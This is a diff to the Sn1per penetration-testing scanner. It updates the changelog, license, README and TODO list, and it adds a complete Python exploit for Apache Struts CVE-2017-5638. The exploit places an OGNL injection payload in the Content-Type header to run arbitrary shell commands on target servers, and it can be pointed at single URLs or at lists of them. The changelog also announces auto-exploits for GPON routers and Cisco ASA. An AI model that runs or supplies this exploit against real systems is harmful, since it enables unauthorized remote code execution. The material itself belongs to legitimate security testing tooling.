Sn1per by 1N3@CrowdShield

CHANGELOG.md

@@ -1,4 +1,20 @@
 ## CHANGELOG:
+* v5.0 - Added Sn1per Pro reporting interface (see https://xerosecurity.com for more details)
+* v5.0 - Added GPON Router RCE auto exploit 
+* v5.0 - Added Cloudapp.net Azure subdomain takeover check
+* v5.0 - Added Cisco ASA Directory Traversal auto exploit (CVE-2018-0296)
+* v5.0 - Added Wig Web Information Gatherer
+* v5.0 - Added Dirsearch with custom dirsearch wordlists (quick, normal, full)
+* v5.0 - Fixed bug in installer/upgrade which copied the local dir contents to the install dir
+* v5.0 - Improved scan performance while taking web screenshots 
+* v5.0 - Fixed repo issue with Slurp (Shoutz to @ifly53e)
+* v5.0 - Fixed issues with wrong ports listed in port scans (Shoutz to @ifly53e)
+* v5.0 - Minor code fixes and typos corrected (Shoutz to @ifly53e)
+* v5.0 - Updated "discover" mode scans for improved performance
+* v4.5 - Added Apache Struts 2 CVE-2017-9805 and CVE-2017-5638 detection
+* v4.5 - Added dirsearch web/file brute forcing
+* v4.5 - Added smart file/directory brute forcing to all scan modes.
+* v4.5 - Added subdomain brute force scan option to Sublist3r scan.
 * v4.4 - Fixed issue with sniper nuke and airstrike modes not running.
 * v4.4 - Added improved SNMP checks via NMap/Metasploit.
 * v4.4 - Resolved dependency issue for nfs-common package.

LICENSE.md

@@ -1,2 +1,2 @@
 ## LICENSE:
-This software is free to distribute, modify and use with the condition that credit is provided to the creator (1N3@CrowdShield) and is not for commercial use.
+Sn1per Community Edition is free to distribute, modify and use with the condition that credit is provided to the creator (1N3@CrowdShield) and is not for commercial or professional use. For commercia and professional use, a Sn1per Professional license must be purchased. 

README.md

@@ -8,12 +8,29 @@
 [![Follow on Twitter](https://img.shields.io/twitter/follow/crowdshield.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=crowdshield)
 
 ## ABOUT:
-Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. 
+Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.
 
 ## DEMO VIDEO:
 [![Demo](https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm.png)](https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm)
 
-## FEATURES:
+## SN1PER PROFESSIONAL FEATURES:
+- [x] Professional reporting interface
+![alt tag](https://xerosecurity.com/images/sn1per-pro1.png)
+- [x] Slideshow for all gathered screenshots
+![alt tag](https://xerosecurity.com/images/sn1per-pro4.png)
+- [x] Searchable and sortable DNS, IP and open port database
+![alt tag](https://xerosecurity.com/images/Sn1per-pro11.png)
+- [x] Categorized host reports
+![alt tag](https://xerosecurity.com/images/Sn1per-pro8.png)
+- [x] Quick links to online recon tools and Google hacking queries
+![alt tag](https://xerosecurity.com/images/sn1per-pro5.png)
+- [x] Personalized notes field for each host
+![alt tag](https://xerosecurity.com/images/sn1per-pro13.png)
+
+## ORDER SN1PER PROFESSIONAL:
+To obtain a Sn1per Professional license, go to https://xerosecurity.com. 
+
+## SN1PER COMMUNITY FEATURES:
 - [x] Automatically collects basic recon (ie. whois, ping, DNS, etc.)
 - [x] Automatically launches Google hacking queries against a target domain
 - [x] Automatically enumerates open ports via NMap port scanning
@@ -139,6 +156,7 @@ sniper -u|--update
 * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.
 * **UPDATE:** Checks for updates and upgrades all components used by sniper.
 * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.
+* **RELOAD:** Reload the master workspace report.
 
 ## SAMPLE REPORT:
 https://gist.github.com/1N3/8214ec2da2c91691bcbc

TODO.md

@@ -1,8 +1,6 @@
 ###TODO:
+* Add selectable plugin configuration to enable/disable each command
 * Add checks to make sure all commands exist at startup. If not, refer to installer. 
 * Create a sniper-kali release to only use base Kali image toolsets
 * Check if there's an active internet connection, if not, run offline mode
 * Add proxy support for all scans
-* Look into adding gobuster
-* Update subdomain list with aquatone list
-* Increase thread count for file/dir brute force

bin/apache_struts_cve-2017-5638.py

@@ -0,0 +1,176 @@
+#!/usr/bin/env python3
+# coding=utf-8
+# *****************************************************
+# struts-pwn: Apache Struts CVE-2017-5638 Exploit
+# Author:
+# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
+# This code is based on:
+# https://www.exploit-db.com/exploits/41570/
+# https://www.seebug.org/vuldb/ssvid-92746
+# *****************************************************
+import sys
+import random
+import requests
+import argparse
+
+# Disable SSL warnings
+try:
+    import requests.packages.urllib3
+    requests.packages.urllib3.disable_warnings()
+except:
+    pass
+
+if len(sys.argv) <= 1:
+    print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
+    print('[*] Struts-PWN - @mazen160')
+    print('\n%s -h for help.' % (sys.argv[0]))
+    exit(0)
+
+parser = argparse.ArgumentParser()
+parser.add_argument("-u", "--url",
+                    dest="url",
+                    help="Check a single URL.",
+                    action='store')
+parser.add_argument("-l", "--list",
+                    dest="usedlist",
+                    help="Check a list of URLs.",
+                    action='store')
+parser.add_argument("-c", "--cmd",
+                    dest="cmd",
+                    help="Command to execute. (Default: id)",
+                    action='store',
+                    default='id')
+parser.add_argument("--check",
+                    dest="do_check",
+                    help="Check if a target is vulnerable.",
+                    action='store_true')
+args = parser.parse_args()
+url = args.url if args.url else None
+usedlist = args.usedlist if args.usedlist else None
+url = args.url if args.url else None
+cmd = args.cmd if args.cmd else None
+do_check = args.do_check if args.do_check else None
+
+
+def url_prepare(url):
+    url = url.replace('#', '%23')
+    url = url.replace(' ', '%20')
+    if ('://' not in url):
+        url = str('http') + str('://') + str(url)
+    return(url)
+
+
+def exploit(url, cmd):
+    url = url_prepare(url)
+    print('\n[*] URL: %s' % (url))
+    print('[*] CMD: %s' % (cmd))
+
+    payload = "%{(#_='multipart/form-data')."
+    payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
+    payload += "(#_memberAccess?"
+    payload += "(#_memberAccess=#dm):"
+    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
+    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
+    payload += "(#ognlUtil.getExcludedClasses().clear())."
+    payload += "(#context.setMemberAccess(#dm))))."
+    payload += "(#cmd='%s')." % cmd
+    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
+    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
+    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
+    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
+    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
+    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
+    payload += "(#ros.flush())}"
+
+    headers = {
+        'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)',
+        # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
+        'Content-Type': str(payload),
+        'Accept': '*/*'
+    }
+
+    timeout = 3
+    try:
+        output = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text
+    except Exception as e:
+        print("EXCEPTION::::--> " + str(e))
+        output = 'ERROR'
+    return(output)
+
+
+def check(url):
+    url = url_prepare(url)
+    print('\n[*] URL: %s' % (url))
+
+    random_string = ''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for i in range(7))
+
+    payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']."
+    payload += "addHeader('%s','%s')}.multipart/form-data" % (random_string, random_string)
+    headers = {
+        'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)',
+        # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
+        'Content-Type': str(payload),
+        'Accept': '*/*'
+    }
+
+    timeout = 3
+    try:
+        resp = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
+        if ((random_string in resp.headers.keys()) and (resp.headers[random_string] == random_string)):
+            result = True
+        else:
+            result = False
+    except Exception as e:
+        print("EXCEPTION::::--> " + str(e))
+        result = False
+    return(result)
+
+
+def main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check):
+    if url:
+        if do_check:
+            result = check(url)  # Only check for existence of Vulnerablity
+            output = '[*] Status: '
+            if result is True:
+                output += 'Vulnerable!'
+            else:
+                output += 'Not Affected.'
+        else:
+            output = exploit(url, cmd)  # Exploit
+        print(output)
+
+    if usedlist:
+        URLs_List = []
+        try:
+            f_file = open(str(usedlist), 'r')
+            URLs_List = f_file.read().replace('\r', '').split('\n')
+            try:
+                URLs_List.remove('')
+            except ValueError:
+                pass
+                f_file.close()
+        except:
+            print('Error: There was an error in reading list file.')
+            exit(1)
+        for url in URLs_List:
+            if do_check:
+                result = check(url)  # Only check for existence of Vulnerablity
+                output = '[*] Status: '
+                if result is True:
+                    output += 'Vulnerable!'
+                else:
+                    output += 'Not Affected.'
+            else:
+                output = exploit(url, cmd)  # Exploit
+            print(output)
+
+    print('[%] Done.')
+
+if __name__ == '__main__':
+    try:
+        main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check)
+    except KeyboardInterrupt:
+        print('\nKeyboardInterrupt Detected.')
+        print('Exiting...')
+        exit(0)